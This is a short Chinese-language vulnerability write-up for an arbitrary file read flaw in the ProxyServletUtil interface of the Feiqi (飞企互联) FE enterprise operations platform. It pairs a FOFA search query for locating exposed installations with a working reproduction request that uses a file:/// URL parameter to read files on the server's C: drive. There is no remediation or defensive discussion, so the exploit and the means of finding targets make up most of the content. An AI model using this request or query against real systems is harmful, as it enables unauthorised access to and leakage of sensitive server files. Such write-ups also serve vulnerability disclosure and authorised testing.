产品简介
飞企互联的FE企业运营管理平台是一款基于先进技术的云工作台,采用云计算、智能化、大数据、物联网和移动互联网等技术,以支撑企业的数字化转型。
漏洞概述
飞企互联FE业务协作平台中的ProxyServletUti接口存在任意文件读取漏洞。攻击者可以通过构造特定请求,读取服务器上的敏感文件,导致潜在信息泄露和安全风险。
网络测绘
fofa: app="飞企互联-FE企业运营管理平台"
漏洞复现
GET /ProxyServletUtil?url=file:///c: HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0